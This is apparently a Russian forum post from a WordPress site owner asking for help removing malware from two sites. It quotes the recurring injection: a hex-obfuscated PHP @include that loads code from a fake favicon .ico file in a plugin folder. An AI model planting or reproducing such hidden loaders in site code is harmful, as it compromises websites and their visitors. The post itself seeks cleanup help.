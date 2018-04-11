Поиск и удаление вирусов на сайтах WP

Нужна помощь.

Есть 2 сайта.

1 сайт: regoladarte.ru, сайт не создается рекламная компания в Google Adwords, формулировка: "Объявление Отклонено: Вредоносное или нежелательное ПО", искал через сервисы и плагины, только 1 сервис показал возможную причину: quttera.com/detailed_repo..., но данный файл скрипта важен, без него не работают основные элементы главной страницы и он был изначально. Вообщем нужно сделать анализ сайта и исправить проблему с вирусом.

2 сайт: weddlngsinema.ru – тут каждый день появляются в разных папках сайта файлы: favicon_РАЗНЫЕЧИСЛА.ico и прописывается в файлах движка и плагинов:

/*7b9bd*/

@include "x2fhox6de/x6camx70ocx300/x77edx64lnx67six6ee mx61.rx75/wx77w/x77p-x63onx74enx74/px6cugx69nsx2fa lx6c-ix6e-ox6ee-x73eox2dpax63k/x66avx69cox6e_1x350 9x632.x69co";

/*7b9bd*/

вот такие конструкции, так же чищу вируса нет, но через 1 день снова в новому месте, права на папки ставили уже минимальные, ставили плагины для защиты WP но они какие то недейственные (видимо не те ставили)

Нужна вообщем помощь человека кто знает как найти и удалить вирусы на сайтах WP и что бы с гарантией хотя бы на 1-3 месяца....